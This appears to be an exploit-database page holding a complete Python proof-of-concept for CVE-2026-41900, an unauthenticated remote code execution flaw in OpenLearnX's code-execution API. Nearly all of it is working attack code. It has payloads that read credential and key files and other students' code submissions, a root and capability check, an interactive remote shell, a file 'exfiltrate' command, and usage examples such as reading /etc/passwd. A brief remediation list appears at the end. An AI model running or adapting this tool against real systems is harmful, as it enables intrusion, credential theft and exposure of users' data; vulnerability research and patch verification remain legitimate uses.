5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3

import argparse
import json
import os
import readline
import sys
import textwrap
import urllib.error
import urllib.request
from datetime import datetime, timezone

RESET  = "\033[0m"
BOLD   = "\033[1m"
RED    = "\033[91m"
GREEN  = "\033[92m"
YELLOW = "\033[93m"
BLUE   = "\033[94m"
CYAN   = "\033[96m"
DIM    = "\033[2m"
MAG    = "\033[95m"
WHITE  = "\033[97m"

BANNER = f"""
{BLUE}╔═══════════════════════════════════════════════════════════════════╗{RESET}
{BLUE}║{RESET}                                                                   {BLUE}║{RESET}
{BLUE}║{RESET}    {BOLD}{WHITE} ██████╗ ██╗     ██╗  ██╗    ██████╗  ██████╗███████╗{RESET}        {BLUE}║{RESET}
{BLUE}║{RESET}    {BOLD}{WHITE}██╔═══██╗██║     ╚██╗██╔╝    ██╔══██╗██╔════╝██╔════╝{RESET}        {BLUE}║{RESET}
{BLUE}║{RESET}    {BOLD}{WHITE}██║   ██║██║      ╚███╔╝     ██████╔╝██║     █████╗  {RESET}        {BLUE}║{RESET}
{BLUE}║{RESET}    {BOLD}{WHITE}██║   ██║██║      ██╔██╗     ██╔══██╗██║     ██╔══╝  {RESET}        {BLUE}║{RESET}
{BLUE}║{RESET}    {BOLD}{WHITE}╚██████╔╝███████╗██╔╝ ██╗    ██║  ██║╚██████╗███████╗{RESET}        {BLUE}║{RESET}
{BLUE}║{RESET}    {BOLD}{WHITE} ╚═════╝ ╚══════╝╚═╝  ╚═╝    ╚═╝  ╚═╝ ╚═════╝╚══════╝{RESET}        {BLUE}║{RESET}
{BLUE}║{RESET}                                                                   {BLUE}║{RESET}
{BLUE}║{RESET}   {CYAN}OpenLearnX Unauthenticated RCE via Container Volume Mount{RESET}      {BLUE}║{RESET}
{BLUE}║{RESET}   {DIM}Tempfile dir traversal → Secret leak → Root container exec{RESET}     {BLUE}║{RESET}
{BLUE}║{RESET}                                                                   {BLUE}║{RESET}
{BLUE}║{RESET}   {YELLOW}CVE-2026-41900{RESET}  •  {YELLOW}GHSA-8h25-q488-4hxw{RESET}                       {BLUE}║{RESET}
{BLUE}║{RESET}                                                                   {BLUE}║{RESET}
{BLUE}║{RESET}                          {MAG}by Christbowel{RESET}                           {BLUE}║{RESET}
{BLUE}╚═══════════════════════════════════════════════════════════════════╝{RESET}
"""

ENDPOINTS = [
    "/api/compiler/execute",
    "/api/coding/execute",
    "/execute",
]

FAIL_PATTERNS = [
    "operation not permitted", "permission denied", "no such file",
    "not found", "cannot open", "traceback", "blocked",
    "security violation", "modulenotfounderror",
]

GADGETS = {
    "listing": {
        "severity": "HIGH",
        "cwe": "CWE-538",
        "desc": "Directory listing of mounted /tmp via /app",
        "code": textwrap.dedent("""\
            import os
            base = '/app'
            entries = os.listdir(base)
            print(f"LISTING:{len(entries)}")
            for e in sorted(entries):
                full = os.path.join(base, e)
                size = os.path.getsize(full) if os.path.isfile(full) else -1
                tag = "DIR" if os.path.isdir(full) else f"{size}B"
                print(f"  {tag:>10s}  {e}")
        """),
        "check": lambda o: "LISTING:" in o and int(o.split("LISTING:")[1].split("\n")[0]) > 1,
    },
    "secrets": {
        "severity": "CRITICAL",
        "cwe": "CWE-538 / CWE-377",
        "desc": "Read credentials and secrets from /tmp",
        "code": textwrap.dedent("""\
            import os, glob
            found = False
            for pat in ['/app/*.conf', '/app/*.pem', '/app/*.key', '/app/*.env',
                        '/app/*.json', '/app/*.yml', '/app/*.yaml', '/app/*.cfg',
                        '/app/*.ini', '/app/*.secret', '/app/*.sock']:
                for f in glob.glob(pat):
                    if os.path.isfile(f) and os.path.getsize(f) < 50000:
                        found = True
                        print(f"FILE:{os.path.basename(f)}:{os.path.getsize(f)}")
                        print(open(f).read()[:800])
                        print("---")
            if not found:
                for f in sorted(glob.glob('/app/*'))[:15]:
                    if os.path.isfile(f) and not f.endswith('.py') and os.path.getsize(f) < 50000:
                        found = True
                        print(f"FILE:{os.path.basename(f)}:{os.path.getsize(f)}")
                        print(open(f).read()[:500])
                        print("---")
            if not found:
                print("NO_FILES")
        """),
        "check": lambda o: "FILE:" in o,
    },
    "submissions": {
        "severity": "HIGH",
        "cwe": "CWE-538",
        "desc": "Read other students' code submissions from /tmp",
        "code": textwrap.dedent("""\
            import os, glob
            own = os.path.abspath(__file__) if '__file__' in dir() else ''
            pyfiles = [f for f in glob.glob('/app/*.py')
                       if os.path.isfile(f) and os.path.abspath(f) != own]
            if pyfiles:
                print(f"SUBMISSIONS:{len(pyfiles)}")
                for f in sorted(pyfiles)[:10]:
                    print(f"\\n--- {os.path.basename(f)} ({os.path.getsize(f)}B) ---")
                    print(open(f).read()[:600])
            else:
                print("NO_SUBMISSIONS")
        """),
        "check": lambda o: "SUBMISSIONS:" in o,
    },
    "rootcheck": {
        "severity": "MEDIUM",
        "cwe": "CWE-250",
        "desc": "Confirm root execution (no user= in containers.run)",
        "code": "import os; uid=os.getuid(); gid=os.getgid(); print(f'UID:{uid} GID:{gid}')",
        "check": lambda o: "UID:0" in o,
    },
    "caps": {
        "severity": "MEDIUM",
        "cwe": "CWE-250",
        "desc": "Default Docker capabilities (no cap_drop)",
        "code": textwrap.dedent("""\
            caps = {}
            for line in open('/proc/1/status'):
                if line.startswith('Cap'):
                    k, v = line.strip().split(':\\t')
                    caps[k] = v
            eff = int(caps.get('CapEff', '0'), 16)
            print(f"CAPEFF:0x{eff:016x}")
            print("DEFAULT_CAPS" if eff > 0 else "CAPS_DROPPED")
        """),
        "check": lambda o: "DEFAULT_CAPS" in o,
    },
}


def log_ok(msg):
    print(f"  {GREEN}[+]{RESET} {msg}")


def log_fail(msg):
    print(f"  {RED}[-]{RESET} {msg}")


def log_info(msg):
    print(f"  {BLUE}[*]{RESET} {msg}")


def log_warn(msg):
    print(f"  {YELLOW}[!]{RESET} {msg}")


def log_hit(sev, msg):
    colors = {"CRITICAL": RED, "HIGH": YELLOW, "MEDIUM": CYAN, "INFO": DIM}
    c = colors.get(sev, WHITE)
    print(f"  {c}[{sev}]{RESET} {msg}")


def http_post(url, payload, timeout=20):
    body = json.dumps(payload).encode()
    req = urllib.request.Request(url, data=body,
                                headers={"Content-Type": "application/json"},
                                method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, json.loads(resp.read())
    except urllib.error.HTTPError as e:
        try:
            return e.code, json.loads(e.read())
        except Exception:
            return e.code, {"error": str(e)}
    except urllib.error.URLError as e:
        return 0, {"error": f"{e.reason}"}
    except Exception as e:
        return 0, {"error": str(e)}


def http_get(url, timeout=10):
    req = urllib.request.Request(url, method="GET")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, json.loads(resp.read())
    except Exception:
        return 0, {}


def execute(endpoint, code, lang="python"):
    status, resp = http_post(endpoint, {"language": lang, "code": code})
    output = (resp.get("output") or "").strip()
    error = (resp.get("error") or "").strip()
    blocked = resp.get("blocked", False)
    return output, error, blocked


def is_hit(output, blocked=False):
    if blocked or not output:
        return False
    low = output.lower()
    return not any(p in low for p in FAIL_PATTERNS)


def find_endpoint(target):
    for suffix in ENDPOINTS:
        url = target + suffix
        log_info(f"Probing {DIM}{url}{RESET}")
        out, err, blk = execute(url, 'print("OLX_PROBE_OK")')
        if "OLX_PROBE_OK" in out:
            log_ok(f"Live endpoint: {GREEN}{url}{RESET}")
            return url
        elif blk:
            log_warn(f"Blocked (patched?) at {url}")
    return None


def run_check(target):
    print(f"\n{BOLD}[CHECK]{RESET} Verifying {target}\n")

    health_url = target + "/api/compiler/health"
    log_info(f"GET {health_url}")
    status, resp = http_get(health_url)
    if status == 200:
        log_ok(f"Health OK — Docker: {resp.get('docker_available')}")
    else:
        log_info("Health endpoint not found (expected for pre-patch)")

    ep = find_endpoint(target)
    if not ep:
        log_fail("No live execution endpoint found")
        return None, False

    out, _, _ = execute(ep, "import os; print(f'UID:{os.getuid()}')")
    root = "UID:0" in out

    out2, _, _ = execute(ep, textwrap.dedent("""\
        import os
        try:
            n = len(os.listdir('/app'))
            print(f"MOUNT:{n}")
        except:
            print("NO_MOUNT")
    """))
    mount = "MOUNT:" in out2

    print()
    if root and mount:
        log_ok(f"{GREEN}VULNERABLE{RESET} — root exec + /tmp volume mount exposed")
        return ep, True
    elif mount:
        log_warn(f"{YELLOW}PARTIAL{RESET} — /tmp mounted but not root")
        return ep, True
    elif root:
        log_warn(f"{YELLOW}PARTIAL{RESET} — root exec but /tmp not mounted")
        return ep, True
    else:
        log_fail(f"{RED}NOT VULNERABLE{RESET} — patched or different config")
        return ep, False


def run_gadget(ep, name):
    g = GADGETS[name]
    log_hit(g["severity"], f"{g['desc']} {DIM}({g['cwe']}){RESET}")
    out, err, blk = execute(ep, g["code"])
    if blk:
        print(f"      {RED}BLOCKED{RESET} — security filter")
        return False
    if g["check"](out):
        for line in out.splitlines()[:30]:
            print(f"      {DIM}│{RESET} {line}")
        return True
    else:
        detail = out[:120] or err[:120] or "(empty)"
        print(f"      {DIM}not confirmed: {detail}{RESET}")
        return False


def run_all_gadgets(ep):
    print(f"\n{BOLD}[EXPLOIT]{RESET} Running all gadgets against {CYAN}{ep}{RESET}\n")
    results = {}
    evidence = []
    for name, g in GADGETS.items():
        hit = run_gadget(ep, name)
        results[name] = hit
        if hit:
            evidence.append({"gadget": name, "severity": g["severity"], "cwe": g["cwe"]})
        print()
    return results, evidence


def run_command(ep, cmd):
    code = textwrap.dedent(f"""\
        import subprocess
        r = subprocess.run({repr(cmd)}, shell=True, capture_output=True, text=True, timeout=15)
        if r.stdout: print(r.stdout, end='')
        if r.stderr: print(r.stderr, end='')
    """)
    out, err, blk = execute(ep, code)
    if blk:
        return f"{RED}[blocked by security filter]{RESET}"
    return out or err or ""


def interactive_shell(ep):
    print(f"\n{BOLD}{CYAN}┌──────────────────────────────────────────────┐{RESET}")
    print(f"{BOLD}{CYAN}│  OLX Remote Shell — CVE-2026-41900           │{RESET}")
    print(f"{BOLD}{CYAN}│  Type 'exit' or Ctrl+C to quit               │{RESET}")
    print(f"{BOLD}{CYAN}│  Each command spawns a new container          │{RESET}")
    print(f"{BOLD}{CYAN}└──────────────────────────────────────────────┘{RESET}\n")

    out, _, _ = execute(ep, "import os; print(os.uname().nodename)")
    hostname = out.strip() or "container"

    histfile = os.path.expanduser("~/.olx_shell_history")
    try:
        readline.read_history_file(histfile)
    except FileNotFoundError:
        pass

    while True:
        try:
            prompt = f"{RED}root@{hostname}{RESET}:{BLUE}/app{RESET}# "
            cmd = input(prompt)
        except (EOFError, KeyboardInterrupt):
            print(f"\n{DIM}[shell closed]{RESET}")
            break

        cmd = cmd.strip()
        if not cmd:
            continue
        if cmd.lower() in ("exit", "quit"):
            print(f"{DIM}[shell closed]{RESET}")
            break

        if cmd.startswith("download "):
            remote_path = cmd.split(" ", 1)[1].strip()
            download_file(ep, remote_path)
            continue

        result = run_command(ep, cmd)
        if result:
            print(result)

    try:
        readline.write_history_file(histfile)
    except Exception:
        pass


def download_file(ep, remote_path):
    if not remote_path.startswith("/app/"):
        remote_path = "/app/" + remote_path.lstrip("/")
    code = textwrap.dedent(f"""\
        import base64, os
        path = {repr(remote_path)}
        if os.path.isfile(path):
            data = open(path, 'rb').read()
            print(f"SIZE:{{len(data)}}")
            print(base64.b64encode(data).decode())
        else:
            print("NOT_FOUND")
    """)
    out, err, blk = execute(ep, code)
    if "NOT_FOUND" in out or blk:
        log_fail(f"File not found: {remote_path}")
        return
    lines = out.strip().splitlines()
    if len(lines) >= 2 and lines[0].startswith("SIZE:"):
        import base64
        size = int(lines[0].split(":")[1])
        data = base64.b64decode(lines[1])
        local = os.path.basename(remote_path)
        with open(local, "wb") as f:
            f.write(data)
        log_ok(f"Downloaded {local} ({size}B)")
    else:
        log_fail(f"Unexpected response: {out[:100]}")


def save_evidence(target, ep, evidence):
    report = {
        "cve": "CVE-2026-41900",
        "ghsa": "GHSA-8h25-q488-4hxw",
        "target": target,
        "endpoint": ep,
        "auth_required": False,
        "timestamp": datetime.now(timezone.utc).isoformat(),
        "findings": evidence,
    }
    path = "cve-2026-41900-evidence.json"
    with open(path, "w") as f:
        json.dump(report, f, indent=2)
    return path


def print_report(target, ep, results, evidence):
    total = sum(1 for v in results.values() if v)
    sevmap = {}
    for e in evidence:
        sevmap.setdefault(e["severity"], []).append(e["gadget"])

    print(f"\n{BLUE}{'═' * 65}{RESET}")
    print(f"  {BOLD}CVE-2026-41900 — RESULTS{RESET}")
    print(f"{BLUE}{'═' * 65}{RESET}")
    print(f"  Target   : {WHITE}{target}{RESET}")
    print(f"  Endpoint : {CYAN}{ep}{RESET}")
    print(f"  Auth     : {RED}NONE REQUIRED{RESET}")
    print(f"  Date     : {datetime.now(timezone.utc).strftime('%Y-%m-%d %H:%M:%S UTC')}")
    print()

    if total == 0:
        log_fail("No vectors confirmed — instance appears patched")
    else:
        for sev in ("CRITICAL", "HIGH", "MEDIUM"):
            if sev in sevmap:
                colors = {"CRITICAL": RED, "HIGH": YELLOW, "MEDIUM": CYAN}
                c = colors[sev]
                print(f"  {c}[{sev:>8s}]{RESET}  {', '.join(sevmap[sev])}")
        print(f"\n  {BOLD}Total : {total} confirmed{RESET}")
        print()
        print(f"  {GREEN}REMEDIATION:{RESET}")
        print(f"    {DIM}→ Update to commit 14765d7 or later{RESET}")
        print(f"    {DIM}→ Apply: cap_drop=['ALL'], user='65534:65534'{RESET}")
        print(f"    {DIM}→ Use per-execution tmpdir, not shared /tmp{RESET}")

    print(f"{BLUE}{'═' * 65}{RESET}")

    if evidence:
        path = save_evidence(target, ep, evidence)
        print(f"\n  {GREEN}Evidence → {path}{RESET}")


def build_parser():
    p = argparse.ArgumentParser(
        prog="olx-rce",
        description="CVE-2026-41900 — OpenLearnX Unauthenticated RCE via Container Volume Mount",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=textwrap.dedent(f"""\
        {BOLD}examples:{RESET}
          %(prog)s --check http://target:5000
          %(prog)s --exploit http://target:5000
          %(prog)s --shell http://target:5000
          %(prog)s -c "id" http://target:5000
          %(prog)s -c "cat /etc/passwd" http://target:5000
          %(prog)s --gadget secrets http://target:5000
          %(prog)s --gadget listing --gadget caps http://target:5000

        {BOLD}gadgets:{RESET}
          listing      /tmp directory listing via volume mount       [HIGH]
          secrets      Read credentials and keys from /tmp           [CRITICAL]
          submissions  Read other users' code submissions            [HIGH]
          rootcheck    Confirm UID 0 execution                       [MEDIUM]
          caps         Dump effective Linux capabilities              [MEDIUM]

        {BOLD}shell commands:{RESET}
          download <path>   Exfiltrate a file from /app to local dir
          exit              Close the shell
        """),
    )

    mode = p.add_argument_group("modes")
    mode.add_argument("--check", action="store_true",
                      help="Check if target is vulnerable (no exploitation)")
    mode.add_argument("--exploit", action="store_true",
                      help="Run all gadgets and generate evidence report")
    mode.add_argument("--shell", action="store_true",
                      help="Drop into an interactive remote shell")
    mode.add_argument("-c", "--command", metavar="CMD",
                      help="Execute a single command and exit")
    mode.add_argument("--gadget", action="append", metavar="NAME",
                      choices=list(GADGETS.keys()),
                      help="Run a specific gadget (repeatable)")

    p.add_argument("target", metavar="TARGET",
                   help="Base URL of the OpenLearnX instance (e.g. http://host:5000)")
    p.add_argument("-q", "--quiet", action="store_true",
                   help="Suppress banner")

    return p


def main():
    parser = build_parser()
    args = parser.parse_args()

    if not args.quiet:
        print(BANNER)

    target = args.target.rstrip("/")

    if not any([args.check, args.exploit, args.shell, args.command, args.gadget]):
        parser.print_help()
        sys.exit(0)

    if args.check:
        ep, vuln = run_check(target)
        sys.exit(0 if vuln else 1)

    ep = find_endpoint(target)
    if not ep:
        log_fail("No live execution endpoint found")
        log_info("Run with --check for detailed diagnostics")
        sys.exit(1)

    if args.command:
        result = run_command(ep, args.command)
        print(result)
        sys.exit(0)

    if args.gadget:
        print(f"\n{BOLD}[GADGETS]{RESET} {', '.join(args.gadget)}\n")
        for name in args.gadget:
            run_gadget(ep, name)
            print()
        sys.exit(0)

    if args.exploit:
        results, evidence = run_all_gadgets(ep)
        print_report(target, ep, results, evidence)
        sys.exit(0 if any(results.values()) else 1)

    if args.shell:
        interactive_shell(ep)
        sys.exit(0)


if __name__ == "__main__":
    main()